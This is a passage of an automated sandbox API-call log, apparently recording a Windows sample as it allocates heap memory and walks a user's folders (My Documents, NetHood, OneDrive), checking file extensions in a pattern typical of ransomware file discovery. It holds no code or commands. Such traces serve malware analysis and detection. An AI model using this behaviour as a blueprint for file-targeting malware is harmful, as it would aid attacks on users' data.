hHeap=0x6a0000) returned 1 [0187.137] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.137] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.138] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.138] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.139] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.139] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.140] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.140] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.141] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.142] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.142] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.143] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.143] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.144] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.144] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.145] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.145] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.146] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.146] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.147] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.147] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.148] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.148] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.149] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.149] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.150] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.150] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.151] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.151] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.152] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.152] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.153] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.153] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.154] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.154] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.155] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.155] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.156] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0187.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0187.156] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.157] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.157] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.158] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.158] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.159] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d2ec90 [0187.159] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d2ec90 | out: hHeap=0x6a0000) returned 1 [0187.160] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.160] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0187.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.161] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.161] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.162] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.162] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.163] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.163] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.164] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.164] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.165] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\My Documents\\") returned="My Documents\\" [0187.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0187.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0187.165] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.165] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.165] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0187.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0187.166] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.166] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.166] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.166] PathFindFileNameW (pszPath="") returned="" [0187.166] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a60 [0187.166] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\My Documents\\*" (normalized: "c:\\users\\keecfmwgj\\my documents\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0xffffffff [0187.167] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a60 | out: hHeap=0x6a0000) returned 1 [0187.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0187.168] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c827f8 | out: hHeap=0x6a0000) returned 1 [0187.168] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2c9f4c8 [0187.170] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0187.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.170] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.170] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.171] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.171] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d38ac0 [0187.172] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0187.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0187.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.172] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\NetHood\\") returned="NetHood\\" [0187.172] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.172] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.172] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27ce8 | out: hHeap=0x6a0000) returned 1 [0187.172] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.173] PathFindFileNameW (pszPath="") returned="" [0187.173] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\NetHood\\*" (normalized: "c:\\users\\keecfmwgj\\nethood\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xca3b29d0, ftCreationTime.dwHighDateTime=0x1d8a391, ftLastAccessTime.dwLowDateTime=0x8434e940, ftLastAccessTime.dwHighDateTime=0x1d8a462, ftLastWriteTime.dwLowDateTime=0x8434e940, ftLastWriteTime.dwHighDateTime=0x1d8a462, nFileSizeHigh=0x0, nFileSizeLow=0x474f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="ZruS.wav", cAlternateFileName="")) returned 0xffffffff [0187.173] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d38ac0 | out: hHeap=0x6a0000) returned 1 [0187.173] PeekMessageW (in: lpMsg=0x30fff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30fff08) returned 0 [0187.173] PeekMessageW (in: lpMsg=0x30ffb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x30ffb74) returned 0 [0187.173] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\") returned="OneDrive\\" [0187.173] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0187.173] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0187.173] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0187.173] PathFindFileNameW (pszPath="") returned="" [0187.173] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\OneDrive\\*" (normalized: "c:\\users\\keecfmwgj\\onedrive\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0187.174] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xf29f86d0, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0187.174] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0187.174] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\OneDrive\\desktop.ini") returned=".ini" [0187.174] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x6, ftCreationTime.dwLowDateTime=0xf2a44990, ftCreationTime.dwHighDateTime=0x1d70911, ftLastAccessTime.dwLowDateTime=0xf2a44990, ftLastAccessTime.dwHighDateTime=0x1d70911, ftLastWriteTime.dwLowDateTime=0xf2a44990, ftLastWriteTime.dwHighDateTime=0x1d70911, nFileSizeHigh=0x0, nFileSizeLow=0x64, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 0 [0187.174] FindClose (in: 